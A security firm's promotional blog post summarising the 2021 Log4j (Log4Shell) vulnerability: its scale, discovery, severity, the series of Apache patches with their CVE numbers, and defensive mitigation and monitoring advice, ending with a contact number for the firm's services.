The Log4j security vulnerability and fallout: It is bad, and will potentially get worse.
The recent Log4j Security Vulnerability has caused waves of panic across both private and public sector industries alike; with the sheer scale of affected platforms and services, along with the ease of exploit for cybercriminals, this is a vulnerability that every organisation should be aware of, but what do you need to know?
What is Log4j?
- Apache Log4j 2 is a widely used Java logging library, it is used for recording error messages in applications.
- Log4j 2 is used across multiple systems and platforms, including Apple, Google, Microsoft, AWS, VMware, Cisco and many more!
- Log4j, also now known as “Log4Shell” is the software vulnerability that was found in Log4j 2.
- The Log4j security vulnerability is a zero-day vulnerability, that was first reported on the 9th December 2021. (Evidence has shown however that it was being exploited before this date)
- The software is in widespread use – in at least 2,800 products used by both private organisations, and governments around the world.
- The flaw in Log4j is projected to be present in over 100 million instances globally.
- The vulnerability can allow unauthenticated remote code execution and access to any server using Log4j over the internet.
How was it Discovered?
- A Security researcher in China (within a large eCommerce company) first reported the vulnerability to the Apache Foundation on November 24.
- The first reported attack was originally discovered on December 9, on servers that host the popular game Minecraft.
- Further analysis has shown that cybercriminals discovered the vulnerability earlier and have been exploiting it since at least 1st December 2021.
How bad is the Log4j Security Vulnerability?
- The Log4j Security vulnerability is classified as severe. It has been given the severity score 10 out of 10, because of its potential for widespread exploitation and the ease with which malicious attackers can exploit it.
- Cybersecurity officials and experts initially described the flaw in the software as “perhaps the worst vulnerability ever discovered.”
- In a blog post published mid-December, researchers stated they are currently seeing around 1,000 attempts per second actively trying to exploit the flaw.
- Security provider Check Point Software reported that it has discovered more than 1.2 million attempts to exploit the vulnerability, stretching across 44% of corporate networks around the world.
- Because of the extensive use of Log4j across the entire IT ecosystem, attackers have leaped at the opportunity to leverage this for a variety of purposes, including crypto jacking, ransomware and other attack methods.
- Security researchers have reported that there have already been hundreds of thousands, perhaps even millions, of attempts to exploit the vulnerability.
- One specific attack hit five victims in finance, banking, and software across the US, Israel, South Korea, Switzerland and Cyprus. In this specific attack, cybercriminals were able to exploit the flaw to install a Trojan malware, which downloads an executable file that then installs a cryptominer.
- Whilst the first wave of attacks have unfolded, U.S. cybersecurity officials have warned that some criminals and nation-state adversaries are likely to be still be waiting to make use of their newfound access to critical systems.
- The huge scale of affected platforms and services means patching can be a complex and time-consuming process.
- Because of the complexity in patching, and its simplicity to exploit, this vulnerability is likely to continue to cause ongoing breaches for years to come.
“The log4j security vulnerability is the most serious vulnerability I have seen in my decades-long career,” Jen Easterly, The Director of US Cybersecurity and Infrastructure Security Agency, stated.
Multiple Software Patching
- Apache initially issued a patch for CVE-2021-44228, version 2.15, on December 6, 2021.
- Unfortunately, this patch left part of the vulnerability unfixed, resulting in a second patch, CVE-2021-45046, version 2.16, being released on December 13th.
- Apache went on to release a third patch, version 2.17, on December 17th to fix another related vulnerability, CVE-2021-45105.
- A fourth patch, 2.17.1, was released on December 28th to address another vulnerability, CVE-2021-44832.
What Should Organisations be Doing to Mitigate Risk?
Many companies are struggling to evaluate the true extent and impact of the Log4j exposure, as it is not obvious which applications and systems even use Log4j. However, it is critical to put measures in place immediately to both access and protect your organisation.
- With such widespread use, hackers are still eagerly looking for unpatched systems that they can compromise.
- With cybercriminals continuously scanning the internet to find exposed targets, if you haven’t already started taking mitigation steps, then it may already be too late.
- Organisations affected by the Log4Shell vulnerability are advised to upgrade Log4j to the latest version from the Apache website (Note: just updating Java is not enough to combat the flaw)
- 3rd parties, such as Cisco, Oracle and VMware have also launched their own patches and fixes to combat the vulnerability.
- Open-source security provider WhiteSource released a free developer tool called WhiteSource Log4j Detect that organisations can run to detect Log4j vulnerabilities.
- It is important to note that simply updating Log4j now, will not resolve issues if an organisation is already compromised.
- If you believe you may be vulnerable, we encourage you to adopt the assumption that you have been breached, remove all physical network access to the affected server and continue your investigation offline from the network.
- If any anomalies are found, we recommend that you assume this is an active breach incident and that you respond accordingly.
- Using next-generation security tools, scanners, threat detection and behavior analytics will help you to identify threats.
Stay Alert – Real-Time Monitoring – User & Behaviour Analytics
- Look for behaviour changes in your logs, review logs for impacted applications for unusual activity.
- Real-time change monitoring- See who, what, when and where any changes are made in your infrastructure.
- Use a solution that recognises past behavioural changes, and takes them into account when identifying potential vulnerabilities.
- Don’t ignore the alerts! Even with all of the tools deployed, often IT teams are so overwhelmed with alerts, they can be missed. If you’re suffering from alert fatigue, our dedicated managed services team can help.
If you need help with the Log4j security vulnerability or need advice on what next-generation cyber security tools you should be using to protect your network, please get in touch with us on 01932 232345